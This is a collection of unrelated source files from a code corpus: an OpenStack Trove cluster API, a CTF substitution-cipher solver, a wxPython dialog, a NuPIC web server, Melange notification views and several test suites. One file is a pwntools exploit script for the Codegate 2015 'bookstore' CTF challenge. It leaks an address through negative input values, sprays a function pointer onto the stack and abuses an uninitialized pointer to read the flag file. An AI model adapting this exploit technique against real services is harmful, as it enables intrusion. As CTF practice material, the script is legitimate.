)
message = supriya.osc.OscMessage(*contents)
return message
### PUBLIC PROPERTIES ###
@property
def callback(self):
return self._callback
@property
def response_patterns(self):
return ["/done", "/d_loadDir"], None
@property
def directory_path(self):
return self._directory_path
| mit | 4,937,795,839,363,454,000 | 25.966102 | 74 | 0.607165 | false |
openstack/trove | trove/common/strategies/cluster/experimental/galera_common/api.py | 1 | 8545 | # Copyright [2015] Hewlett-Packard Development Company, L.P.
# Copyright 2016 Tesora Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log as logging
import time
from trove.cluster import models as cluster_models
from trove.cluster.tasks import ClusterTasks
from trove.cluster.views import ClusterView
from trove.common import cfg
from trove.common import exception
from trove.common import server_group as srv_grp
from trove.common.strategies.cluster import base as cluster_base
from trove.extensions.mgmt.clusters.views import MgmtClusterView
from trove.instance.models import DBInstance
from trove.instance.models import Instance
from trove.quota.quota import check_quotas
from trove.taskmanager import api as task_api
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class GaleraCommonAPIStrategy(cluster_base.BaseAPIStrategy):
@property
def cluster_class(self):
return GaleraCommonCluster
@property
def cluster_view_class(self):
return GaleraCommonClusterView
@property
def mgmt_cluster_view_class(self):
return GaleraCommonMgmtClusterView
class GaleraCommonCluster(cluster_models.Cluster):
@staticmethod
def _validate_cluster_instances(context, instances, datastore,
datastore_version):
"""Validate the flavor and volume"""
ds_conf = CONF.get(datastore_version.manager)
num_instances = len(instances)
# Checking volumes and get delta for quota check
cluster_models.validate_instance_flavors(
context, instances, ds_conf.volume_support, ds_conf.device_path)
req_volume_size = cluster_models.get_required_volume_size(
instances, ds_conf.volume_support)
cluster_models.assert_homogeneous_cluster(instances)
deltas = {'instances': num_instances, 'volumes': req_volume_size}
# quota check
check_quotas(context.project_id, deltas)
# Checking networks are same for the cluster
cluster_models.validate_instance_nics(context, instances)
@staticmethod
def _create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration_id):
member_config = {"id": db_info.id,
"instance_type": "member"}
name_index = int(time.time())
for instance in instances:
if not instance.get("name"):
instance['name'] = "%s-member-%s" % (db_info.name,
str(name_index))
name_index += 1
return [Instance.create(context,
instance['name'],
instance['flavor_id'],
datastore_version.image_id,
[], [],
datastore, datastore_version,
instance.get('volume_size', None),
None,
availability_zone=instance.get(
'availability_zone', None),
nics=instance.get('nics', None),
configuration_id=configuration_id,
cluster_config=member_config,
volume_type=instance.get(
'volume_type', None),
modules=instance.get('modules'),
locality=locality,
region_name=instance.get('region_name')
)
for instance in instances]
@classmethod
def create(cls, context, name, datastore, datastore_version,
instances, extended_properties, locality, configuration):
LOG.debug("Initiating Galera cluster creation.")
ds_conf = CONF.get(datastore_version.manager)
# Check number of instances is at least min_cluster_member_count
if len(instances) < ds_conf.min_cluster_member_count:
raise exception.ClusterNumInstancesNotLargeEnough(
num_instances=ds_conf.min_cluster_member_count)
cls._validate_cluster_instances(context, instances, datastore,
datastore_version)
# Updating Cluster Task
db_info = cluster_models.DBCluster.create(
name=name, tenant_id=context.project_id,
datastore_version_id=datastore_version.id,
task_status=ClusterTasks.BUILDING_INITIAL,
configuration_id=configuration)
cls._create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration)
# Calling taskmanager to further proceed for cluster-configuration
task_api.load(context, datastore_version.manager).create_cluster(
db_info.id)
return cls(context, db_info, datastore, datastore_version)
def grow(self, instances):
LOG.debug("Growing cluster %s.", self.id)
self.validate_cluster_available()
context = self.context
db_info = self.db_info
datastore = self.ds
datastore_version = self.ds_version
self._validate_cluster_instances(context, instances, datastore,
datastore_version)
db_info.update(task_status=ClusterTasks.GROWING_CLUSTER)
try:
locality = srv_grp.ServerGroup.convert_to_hint(self.server_group)
configuration_id = self.db_info.configuration_id
new_instances = self._create_instances(
context, db_info, datastore, datastore_version, instances,
None, locality, configuration_id)
task_api.load(context, datastore_version.manager).grow_cluster(
db_info.id, [instance.id for instance in new_instances])
except Exception:
db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(context, db_info,
datastore, datastore_version)
def shrink(self, instances):
"""Removes instances from a cluster."""
LOG.debug("Shrinking cluster %s.", self.id)
self.validate_cluster_available()
removal_instances = [Instance.load(self.context, inst_id)
for inst_id in instances]
db_instances = DBInstance.find_all(
cluster_id=self.db_info.id, deleted=False).all()
if len(db_instances) - len(removal_instances) < 1:
raise exception.ClusterShrinkMustNotLeaveClusterEmpty()
self.db_info.update(task_status=ClusterTasks.SHRINKING_CLUSTER)
try:
task_api.load(self.context, self.ds_version.manager
).shrink_cluster(self.db_info.id,
[instance.id
for instance in removal_instances])
except Exception:
self.db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(self.context, self.db_info,
self.ds, self.ds_version)
def restart(self):
self.rolling_restart()
def upgrade(self, datastore_version):
self.rolling_upgrade(datastore_version)
def configuration_attach(self, configuration_id):
self.rolling_configuration_update(configuration_id)
def configuration_detach(self):
self.rolling_configuration_remove()
class GaleraCommonClusterView(ClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
class GaleraCommonMgmtClusterView(MgmtClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
| apache-2.0 | 6,938,992,577,265,040,000 | 38.37788 | 79 | 0.604447 | false |
chenyoufu/writeups | jarvisoj/basic_cake.py | 1 | 1448 | s = '''
nit yqmg mqrqn bxw mtjtm nq rqni fiklvbxu mqrqnl xwg dvmnzxu lqjnyxmt xatwnl, rzn nit uxnntm xmt zlzxuuk mtjtmmtg nq xl rqnl. nitmt vl wq bqwltwlzl qw yivbi exbivwtl pzxuvjk xl mqrqnl rzn nitmt vl atwtmxu xamttetwn xeqwa tsftmnl, xwg nit fzruvb, nixn mqrqnl ntwg nq gq lqet qm xuu qj nit jquuqyvwa: xbbtfn tutbnmqwvb fmqamxeevwa, fmqbtll gxnx qm fiklvbxu ftmbtfnvqwl tutbnmqwvbxuuk, qftmxnt xznqwqeqzluk nq lqet gtamtt, eqdt xmqzwg, qftmxnt fiklvbxu fxmnl qj vnltuj qm fiklvbxu fmqbtlltl, ltwlt xwg exwvfzuxnt nitvm twdvmqwetwn, xwg tsivrvn vwntuuvatwn rtixdvqm - tlftbvxuuk rtixdvqm yivbi evevbl izexwl qm qnitm xwvexul. juxa vl lzrlnvnzntfxllvldtmktxlkkqzaqnvn. buqltuk mtuxntg nq nit bqwbtfn qj x mqrqn vl nit jvtug qj lkwnitnvb rvquqak, yivbi lnzgvtl twnvnvtl yiqlt wxnzmt vl eqmt bqefxmxrut nq rtvwal nixw nq exbivwtl.
'''
print [x for x in s.split(' ') if len(x) == 1]
print [x for x in s.split(' ') if len(x) == 2]
m = {
'a': 'g',
'b': 'c',
'd': 'v',
'e': 'm',
'f': 'p',
'x': 'a',
'r': 'b',
's': 'x',
'z': 'u',
'g': 'd',
'y': 'w',
'j': 'f',
'u': 'l',
'k': 'y',
'w': 'n',
'q': 'o',
'v': 'i',
'l': 's',
'n': 't',
'i': 'h',
't': 'e',
'm': 'r'
}
ss = ''
for x in s:
if x in m.keys():
ss += m[x]
else:
ss += x
print ss
flag = 'lzrlnvnzntfxllvldtmktxlkkqzaqnvn'
for f in flag:
if f not in m.keys():
print f
| gpl-3.0 | -6,093,663,068,113,639,000 | 29.166667 | 823 | 0.608425 | false |
swprojects/Serial-Sequence-Creator | dialogs/setvoltage.py | 1 | 5066 | """
Description:
Requirements: pySerial, wxPython Phoenix
glossary and of other descriptions:
DMM - digital multimeter
PSU - power supply
SBC - single board computer
INS - general instrument commands
GEN - general sequence instructions
"""
import logging
import sys
import time
import wx
import theme
import base
class SetVoltage(wx.Dialog):
def __init__(self, parent, instruments):
wx.Dialog.__init__(self,
parent,
title="Set Voltage")
panel = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
hsizer = wx.BoxSizer(wx.HORIZONTAL)
sbox = wx.StaticBox(panel, label="")
sbox_sizer = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)
grid = wx.GridBagSizer(5,5)
row = 0
# row += 1 #let's start at 1, to give some space
lbl_psu = wx.StaticText(panel, label="Power Supply:")
choices = ["Choose on execution"]
choices.extend(instruments)
self.cbox_psu = wx.ComboBox(panel, choices=choices)
# self.cbox_psu.Bind(wx.EVT_COMBOBOX, self.OnPsuSelected)
grid.Add(lbl_psu, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)
grid.Add(self.cbox_psu, pos=(row,1), span=(0,3), flag=wx.ALL|wx.EXPAND, border=5)
grid.AddGrowableCol(1)
row += 1
text_voltage = wx.StaticText(panel, label="Set Voltage:")
self.spin_voltage = wx.SpinCtrl(panel, max=30, min=0, size=(50, -1))
self.spin_voltage2 = wx.SpinCtrl(panel, max=99, min=0, size=(50, -1))
self.spin_voltage.Bind(wx.EVT_SPINCTRL, self.OnSpinVoltage)
self.spin_voltage2.Bind(wx.EVT_SPINCTRL, self.OnSpinVoltage)
self.lbl_voltage = wx.StaticText(panel, label="0.0v")
grid.Add(text_voltage, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)
grid.Add(self.spin_voltage, pos=(row,1), flag=wx.ALL, border=5)
grid.Add(self.spin_voltage2, pos=(row,2), flag=wx.ALL, border=5)
grid.Add(self.lbl_voltage, pos=(row,3), flag=wx.ALL|wx.EXPAND, border=5)
sbox_sizer.Add(grid, 1, wx.ALL|wx.EXPAND, 0)
sbox_sizer.AddSpacer(10)
#-----
hsizer = wx.BoxSizer(wx.HORIZONTAL)
hsizer.AddStretchSpacer()
btn_cancel = wx.Button(panel, label="Cancel", id=wx.ID_CANCEL)
btn_cancel.Bind(wx.EVT_BUTTON, self.OnButton)
self.btn_add = wx.Button(panel, label="Add", id=wx.ID_OK)
self.btn_add.Bind(wx.EVT_BUTTON, self.OnButton)
hsizer.Add(btn_cancel, 0, wx.ALL|wx.EXPAND, 5)
hsizer.Add(self.btn_add, 0, wx.ALL|wx.EXPAND, 5)
#add to main sizer
sizer.Add(sbox_sizer, 0, wx.ALL|wx.EXPAND, 2)
sizer.Add(hsizer, 0, wx.ALL|wx.EXPAND, 5)
panel.SetSizer(sizer)
w, h = sizer.Fit(self)
# self.SetSize((w, h*1.5))
# self.SetMinSize((w, h*1.5))
# self.SetMaxSize(sizer.Fit(self))
try:
self.SetIcon(theme.GetIcon("psu_png"))
except:
pass
self.Bind(wx.EVT_KEY_UP, self.OnKeyUp)
def OnKeyUp(self, event):
key = event.GetKeyCode()
print(event)
if key == wx.KEY_ESCAPE:
self.EndModal(wx.ID_CANCEL)
def OnSpinVoltage(self, event=None):
v0 = self.spin_voltage.GetValue()
v1 = self.spin_voltage2.GetValue()
label = str(v0) + "." + str(v1) + "v"
self.lbl_voltage.SetLabel(label)
def OnButton(self, event):
e = event.GetEventObject()
label = e.GetLabel()
id = e.GetId()
if label == "Cancel":
self.EndModal(id)
elif label == "Add":
self.EndModal(id)
def SetValue(self, data):
params = data["parameters"]
params = "), " + params[1:-1] + ", (" #so we can split it easier
param_dict = {}
params = params.split("), (")
for param in params:
param = param[1: -1]
if param == "":
continue
key, value = param.split("', '")
param_dict[key] = value
self.cbox_psu.SetValue(param_dict["psu"])
self.lbl_voltage.SetLabel(param_dict["v0"])
spin1, spin2 = param_dict["v0"][:-1].split(".")
self.spin_voltage.SetValue(spin1)
self.spin_voltage2.SetValue(spin2)
def GetValue(self):
psu = self.cbox_psu.GetValue()
if psu != "":
for char in psu:
if char.isdigit() or char.isalpha():
continue
psu = psu.replace(char, "_")
data = [("psu", psu),
("v0", self.lbl_voltage.GetLabel())]
data = {"action":"Set Voltage",
"parameters":str(data),}
return data | mit | -3,217,298,695,919,984,600 | 30.867925 | 89 | 0.530004 | false |
NunoEdgarGub1/nupic | nupic/simple_server.py | 1 | 3599 | #! /usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
A simple web server for interacting with NuPIC.
Note: Requires web.py to run (install using '$ pip install web.py')
"""
import os
import sys
# The following loop removes the nupic.nupic package from the
# PythonPath (sys.path). This is necessary in order to let web
# import the built in math module rather than defaulting to
# nupic.math
while True:
try:
sys.path.remove(os.path.dirname(os.path.realpath(__file__)))
except:
break
import datetime
import json
import web
from nupic.frameworks.opf.modelfactory import ModelFactory
g_models = {}
urls = (
# Web UI
"/models", "ModelHandler",
r"/models/([-\w]*)", "ModelHandler",
r"/models/([-\w]*)/run", "ModelRunner",
)
class ModelHandler(object):
def GET(self):
"""
/models
returns:
[model1, model2, model3, ...] list of model names
"""
global g_models
return json.dumps({"models": g_models.keys()})
def POST(self, name):
"""
/models/{name}
schema:
{
"modelParams": dict containing model parameters
"predictedFieldName": str
}
returns:
{"success":name}
"""
global g_models
data = json.loads(web.data())
modelParams = data["modelParams"]
predictedFieldName = data["predictedFieldName"]
if name in g_models.keys():
raise web.badrequest("Model with name <%s> already exists" % name)
model = ModelFactory.create(modelParams)
model.enableInference({'predictedField': predictedFieldName})
g_models[name] = model
return json.dumps({"success": name})
class ModelRunner(object):
def POST(self, name):
"""
/models/{name}/run
schema:
{
predictedFieldName: value
timestamp: %m/%d/%y %H:%M
}
NOTE: predictedFieldName MUST be the same name specified when
creating the model.
returns:
{
"predictionNumber":<number of record>,
"anomalyScore":anomalyScore
}
"""
global g_models
data = json.loads(web.data())
data["timestamp"] = datetime.datetime.strptime(
data["timestamp"], "%m/%d/%y %H:%M")
if name not in g_models.keys():
raise web.notfound("Model with name <%s> does not exist." % name)
modelResult = g_models[name].run(data)
predictionNumber = modelResult.predictionNumber
anomalyScore = modelResult.inferences["anomalyScore"]
return json.dumps({"predictionNumber": predictionNumber,
"anomalyScore": anomalyScore})
web.config.debug = False
app = web.application(urls, globals())
if __name__ == "__main__":
app.run()
| gpl-3.0 | 307,131,252,297,311,600 | 23.82069 | 72 | 0.639066 | false |
ARudiuk/mne-python | mne/io/array/tests/test_array.py | 3 | 3552 | from __future__ import print_function
# Author: Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import warnings
import matplotlib
from numpy.testing import assert_array_almost_equal, assert_allclose
from nose.tools import assert_equal, assert_raises, assert_true
from mne import find_events, Epochs, pick_types
from mne.io import Raw
from mne.io.array import RawArray
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.meas_info import create_info, _kind_dict
from mne.utils import slow_test, requires_version, run_tests_if_main
matplotlib.use('Agg') # for testing don't use X server
warnings.simplefilter('always') # enable b/c these tests might throw warnings
base_dir = op.join(op.dirname(__file__), '..', '..', 'tests', 'data')
fif_fname = op.join(base_dir, 'test_raw.fif')
@slow_test
@requires_version('scipy', '0.12')
def test_array_raw():
"""Test creating raw from array
"""
import matplotlib.pyplot as plt
# creating
raw = Raw(fif_fname).crop(2, 5, copy=False)
data, times = raw[:, :]
sfreq = raw.info['sfreq']
ch_names = [(ch[4:] if 'STI' not in ch else ch)
for ch in raw.info['ch_names']] # change them, why not
# del raw
types = list()
for ci in range(102):
types.extend(('grad', 'grad', 'mag'))
types.extend(['stim'] * 9)
types.extend(['eeg'] * 60)
# wrong length
assert_raises(ValueError, create_info, ch_names, sfreq, types)
# bad entry
types.append('foo')
assert_raises(KeyError, create_info, ch_names, sfreq, types)
types[-1] = 'eog'
# default type
info = create_info(ch_names, sfreq)
assert_equal(info['chs'][0]['kind'], _kind_dict['misc'][0])
# use real types
info = create_info(ch_names, sfreq, types)
raw2 = _test_raw_reader(RawArray, test_preloading=False,
data=data, info=info, first_samp=2 * data.shape[1])
data2, times2 = raw2[:, :]
assert_allclose(data, data2)
assert_allclose(times, times2)
assert_true('RawArray' in repr(raw2))
assert_raises(TypeError, RawArray, info, data)
# filtering
picks = pick_types(raw2.info, misc=True, exclude='bads')[:4]
assert_equal(len(picks), 4)
raw_lp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_lp.filter(0., 4.0 - 0.25, picks=picks, n_jobs=2)
raw_hp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_hp.filter(8.0 + 0.25, None, picks=picks, n_jobs=2)
raw_bp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_bp.filter(4.0 + 0.25, 8.0 - 0.25, picks=picks)
raw_bs = raw2.copy()
with warnings.catch_warnings(record=True):
raw_bs.filter(8.0 + 0.25, 4.0 - 0.25, picks=picks, n_jobs=2)
data, _ = raw2[picks, :]
lp_data, _ = raw_lp[picks, :]
hp_data, _ = raw_hp[picks, :]
bp_data, _ = raw_bp[picks, :]
bs_data, _ = raw_bs[picks, :]
sig_dec = 11
assert_array_almost_equal(data, lp_data + bp_data + hp_data, sig_dec)
assert_array_almost_equal(data, bp_data + bs_data, sig_dec)
# plotting
raw2.plot()
raw2.plot_psd()
plt.close('all')
# epoching
events = find_events(raw2, stim_channel='STI 014')
events[:, 2] = 1
assert_true(len(events) > 2)
epochs = Epochs(raw2, events, 1, -0.2, 0.4, preload=True)
epochs.plot_drop_log()
epochs.plot()
evoked = epochs.average()
evoked.plot()
assert_equal(evoked.nave, len(events) - 1)
plt.close('all')
run_tests_if_main()
| bsd-3-clause | -862,542,634,687,912,300 | 32.509434 | 79 | 0.630349 | false |
Qwaz/solved-hacking-problem | Codegate/2015 Quals/bookstore/bookstore.py | 1 | 1395 | from pwn import *
def talk(send, until, no_newline=False):
if until:
str = r.recvuntil(until)
print str + send
if no_newline:
r.send(send)
else:
r.sendline(send)
else:
str = r.recv()
print str + send
if no_newline:
r.send(send)
else:
r.sendline(send)
r = remote('localhost', 8020)
# Login
talk('helloadmin', 'ID : ')
talk('iulover!@#$%', 'PASSWORD : ')
# Add Book
talk('1', '> ')
talk('book', '\n')
talk('desc', '\n')
talk('0', '\n')
# Modify Price and Stock
talk('2', '> ')
talk('0', 'No : ')
talk('3', 'menu!\n')
talk('-1', '\n')
talk('-1', '\n')
talk('0', '\n')
talk('1', '\n')
talk('aaaa'*100, '\n')
talk('xxxx'*100, 'description\n')
talk('0', 'menu!\n')
# Get Offset
talk('4', '> ')
offset_before = r.recvuntil('a'*20)
offset_str = r.recvuntil('> ')
offset = u32(offset_str[8:12])
log.success("%x" % offset)
offset = offset - 0x9AD + 0x8DB
log.success("%x" % offset)
print offset_before + offset_str
# Fill Stack
r.sendline('2')
talk('0', 'No : ')
talk('2', 'menu!\n')
talk(p32(offset)*750, '\n')
# Uninitialized Shipping Pointer
talk('3', 'menu!\n')
talk('-1', '\n')
talk('-1', '\n')
talk('0', '\n')
talk('1', '\n')
talk('./flag', '\n', no_newline=True)
talk('desc', 'description\n')
# Modify Freeshipping
talk('4', 'menu!\n')
talk('1', '\n')
talk('0', 'menu!\n')
# Call ViewBook
talk('3', '> ')
talk('0', 'No : ')
# Close Program
talk('0', '> ')
| gpl-2.0 | -2,153,698,298,135,402,800 | 16.658228 | 40 | 0.564158 | false |
SRabbelier/Melange | app/soc/views/models/notification.py | 1 | 9142 | #!/usr/bin/env python2.5
#
# Copyright 2008 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains the view code for Notifications.
"""
__authors__ = [
'"Lennard de Rijk" <[email protected]>',
]
import time
from google.appengine.ext import db
from django import forms
from django import http
from django.utils.translation import ugettext
from soc.logic import cleaning
from soc.logic import dicts
from soc.logic.models.notification import logic as notification_logic
from soc.logic.models.site import logic as site_logic
from soc.logic.models.user import logic as user_logic
from soc.models import notification as notification_model
from soc.views import helper
from soc.views.helper import access
from soc.views.helper import decorators
from soc.views.helper import lists as list_helper
from soc.views.helper import redirects
from soc.views.models import base
class CreateForm(helper.forms.BaseForm):
"""Form for creating a Notification.
"""
# to user field
to_user = forms.fields.CharField(label='To User')
def __init__(self, *args, **kwargs):
""" Calls super and then redefines the order in which the fields appear.
for parameters see BaseForm.__init__()
"""
super(CreateForm, self).__init__(*args, **kwargs)
# set form fields order
self.fields.keyOrder = ['to_user', 'subject', 'message']
class Meta:
"""Inner Meta class that defines some behavior for the form.
"""
model = notification_model.Notification
fields = None
# exclude the necessary fields from the form
exclude = ['link_id', 'scope', 'scope_path', 'from_user', 'unread']
clean_to_user = cleaning.clean_existing_user('to_user')
class View(base.View):
"""View methods for the Notification model.
"""
def __init__(self, params=None):
"""Defines the fields and methods required for the base View class
to provide the user with list, public, create, edit and delete views.
Params:
params: a dict with params for this View
"""
rights = access.Checker(params)
rights['edit'] = ['deny']
rights['show'] = [('checkIsMyEntity', [notification_logic, 'scope_path'])]
rights['delete'] = [('checkIsMyEntity', [notification_logic, 'scope_path'])]
rights['list'] = ['checkIsUser']
# create is developer only for the time being to test functionality
rights['create'] = ['checkIsDeveloper']
new_params = {}
new_params['logic'] = notification_logic
new_params['rights'] = rights
new_params['name'] = "Notification"
new_params['no_create_with_key_fields'] = True
new_params['create_form'] = CreateForm
new_params['edit_redirect'] = '/%(url_name)s/list'
new_params['public_configuration'] = {"multiselect": True}
new_params['public_field_prefetch'] = ['from_user']
new_params['public_field_extra'] = lambda entity: {
"from": entity.from_user.name if entity.from_user else
site_logic.getSingleton().site_name,
"unread": "Not Read" if entity.unread else "Read",
}
new_params['public_field_props'] = {
"unread": {
"stype": "select",
"editoptions": {"value": ":All;^Read$:Read;^Not Read$:Not Read"}
}
}
new_params['public_conf_extra'] = {
"multiselect": True,
}
new_params['public_field_keys'] = ["unread", "from", "subject",
"created_on",]
new_params['public_field_names'] = ["Unread", "From", "Subject",
"Received on"]
new_params['public_button_global'] = [
{
'bounds': [1,'all'],
'id': 'mark_read',
'caption': 'Mark as Read',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
},
{
'bounds': [1,'all'],
'id': 'mark_unread',
'caption': 'Mark as Unread',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
},
{
'bounds': [1,'all'],
'id': 'delete',
'caption': 'Delete Notification',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
}]
params = dicts.merge(params, new_params)
params['public_row_extra'] = lambda entity: {
"link": redirects.getPublicRedirect(entity, params)
}
super(View, self).__init__(params=params)
@decorators.merge_params
@decorators.check_access
def list(self, request, access_type, page_name=None, params=None,
filter=None, order=None, **kwargs):
"""Lists all notifications that the current logged in user has stored.
for parameters see base.list()
"""
if request.method == 'POST':
return self.listPost(request, params, **kwargs)
else: # request.method == 'GET'
if not order:
order = ['-created_on']
user_entity = user_logic.getCurrentUser()
filter = {'scope': user_entity}
return super(View, self).list(request, access_type, page_name=page_name,
params=params, filter=filter, order=order,
**kwargs)
def listPost(self, request, params, **kwargs):
"""Handles the POST request for the list of notifications.
"""
import logging
from django.utils import simplejson
post_dict = request.POST
data = simplejson.loads(post_dict.get('data', '[]'))
button_id = post_dict.get('button_id', '')
user_entity = user_logic.getCurrentUser()
notifications = []
for selection in data:
notification = notification_logic.getFromKeyName(selection['key'])
if not notification:
logging.error('No notification found for %(key)s' %selection)
continue
if notification.scope.key() == user_entity.key():
notifications.append(notification)
if button_id == 'delete':
for notification in notifications:
notification_logic.delete(notification)
elif button_id == 'mark_read' or button_id == 'mark_unread':
if button_id == 'mark_read':
# mark all the Notifications selected as read
fields = {'unread': False}
elif button_id == 'mark_unread':
# mark all the Notifications selected as unread
fields = {'unread': True}
for notification in notifications:
notification_logic.updateEntityProperties(notification, fields,
store=False)
db.put(notifications)
# return a 200 response to signal that all is okay
return http.HttpResponseRedirect('')
def _editPost(self, request, entity, fields):
"""See base.View._editPost().
"""
# get the current user
current_user = user_logic.getCurrentUser()
fields['link_id'] = 't%i' % (int(time.time()*100))
fields['scope'] = fields['to_user']
fields['from_user'] = current_user
fields['scope_path'] = fields['to_user'].link_id
def _editSeed(self, request, seed):
"""Checks if scope_path is seeded and puts it into to_user.
for parameters see base._editSeed()
"""
# if scope_path is present
if 'scope_path' in seed.keys():
# fill the to_user field with the scope path
seed['to_user'] = seed['scope_path']
def _public(self, request, entity, context):
"""Marks the Notification as read if that hasn't happened yet.
for parameters see base._public()
"""
# if the user viewing is the user for which this notification is meant
# and the notification has not been read yet
if entity.unread:
# get the current user
user = user_logic.getCurrentUser()
# if the message is meant for the user that is reading it
# pylint: disable=E1103
if entity.scope.key() == user.key():
# mark the entity as read
self._logic.updateEntityProperties(entity, {'unread' : False} )
context['entity_type_url'] = self._params['url_name']
context['entity_suffix'] = entity.key().id_or_name() if entity else None
context['page_name'] = 'Notification - %s' % (entity.subject)
return True
view = View()
admin = decorators.view(view.admin)
create = decorators.view(view.create)
edit = decorators.view(view.edit)
delete = decorators.view(view.delete)
list = decorators.view(view.list)
public = decorators.view(view.public)
export = decorators.view(view.export)
| apache-2.0 | -9,177,998,094,437,962,000 | 30.415808 | 80 | 0.618355 | false |
DarkEnergyScienceCollaboration/pserv | tests/test_Pserv.py | 1 | 18496 | """
Unit tests for pserv package.
"""
from __future__ import absolute_import, print_function
import os
import csv
import unittest
from collections import OrderedDict
from warnings import filterwarnings
import ConfigParser
import numpy as np
import astropy.io.fits as fits
import desc.pserv
filterwarnings('ignore')
def get_db_info():
"""
Try to connect to Travis CI MySQL services or the user's via
~/.my.cnf and return the connection info. Otherwise, return
an empty dict, which should skip the tests.
"""
try:
try:
# Travis CI usage:
db_info = dict(database='myapp_test', username='travis',
host='127.0.0.1', port='3306')
desc.pserv.DbConnection(**db_info)
except RuntimeError as eobj:
print(eobj)
# Read the user's default configuration from ~/.my.cnf
parser = ConfigParser.ConfigParser()
parser.read(os.path.join(os.environ['HOME'], '.my.cnf'))
db_info = dict(parser.items('client'))
db_info['database'] = 'test'
if db_info.has_key('user'):
del db_info['user']
if db_info.has_key('password'):
del db_info['password']
desc.pserv.DbConnection(**db_info)
except StandardError as eobj:
print("No database connection:")
print(eobj)
db_info = {}
return db_info
_db_info = get_db_info()
@unittest.skipUnless(_db_info, "MySQL database not available")
class PservTestCase(unittest.TestCase):
"""
TestCase for Pserv module.
"""
def setUp(self):
"""
Create a connection and test table.
"""
self.connection = desc.pserv.DbConnection(**_db_info)
self.test_table = 'my_test'
self.project = 'my project'
self.data = (('a', 1, 130., 3.1943029977e-24, self.project),
('b', 4, 1.4938229e-20, 4.408099891e10, self.project),
('c', 100, np.pi, np.pi, self.project),
('d', 3, 4.9039542e20, 9.487982348e30, self.project))
self._create_test_table()
# FITS/csv related set up:
self.fits_file = 'my_test_data.fits'
self._create_fits_bintable()
self.csv_file = self._create_csv_file()
def tearDown(self):
"""
Drop the test table and close the connection.
"""
self.connection.apply('drop table if exists %s;' % self.test_table)
del self.connection
# FITS/csv related tear down:
if os.path.isfile(self.fits_file):
os.remove(self.fits_file)
if os.path.isfile(self.csv_file):
os.remove(self.csv_file)
def _create_test_table(self):
"""
Create the test table.
"""
self.connection.apply('drop table if exists %s;' % self.test_table)
query = """create table %s (keywd char(1), int_value int,
float_value float, double_value double,
project char(30));""" % self.test_table
self.connection.apply(query)
def _fill_test_table(self):
"""
Fill the test db table with key/value pairs from self.data.
"""
table_name = self.test_table
values = ','.join(["('%s', %i, %e, %e, '%s')" % row
for row in self.data]) + ';'
query = "insert into %(table_name)s values %(values)s" % locals()
self.connection.apply(query)
def _query_test_table(self):
"""
Query for the test table contents.
"""
query = """select keywd, int_value, float_value, double_value,
project from %s""" % self.test_table
return self.connection.apply(
query, cursorFunc=lambda curs: tuple(x for x in curs))
def _compare_to_ref_data(self, query_data, places=5):
"Compare data from querys to reference data."
for query_row, ref_row in zip(query_data, self.data):
self.assertEqual(query_row[0], ref_row[0])
self.assertEqual(query_row[1], ref_row[1])
format_ = '%.' + str(places) + 'e'
fp1 = format_ % query_row[2]
fp2 = format_ % ref_row[2]
self.assertEqual(fp1, fp2)
self.assertEqual(query_row[4], self.project)
#self.assertAlmostEqual(query_row[2], ref_row[2], places=places)
def test_apply_cursorFunc(self):
"""
Test the apply method using a cursor function to retrieve and
package the query results.
"""
self._fill_test_table()
table_data = self._query_test_table()
self._compare_to_ref_data(table_data)
def _create_fits_bintable(self):
"""
Create the test FITS file with a binary table with the data in
self.data.
"""
hdulist = fits.HDUList()
hdulist.append(fits.PrimaryHDU())
colnames = ['KEYWORD', 'INT_VALUE', 'FLOAT_VALUE', 'DOUBLE_VALUE']
formats = 'AIED'
data = list(zip(*self.data))
columns = [fits.Column(name=colnames[i], format=formats[i],
array=data[i]) for i in range(len(colnames))]
bintable = fits.BinTableHDU.from_columns(columns)
bintable.name = 'TEST_DATA'
hdulist.append(bintable)
if os.path.isfile(self.fits_file):
os.remove(self.fits_file)
hdulist.writeto(self.fits_file)
@staticmethod
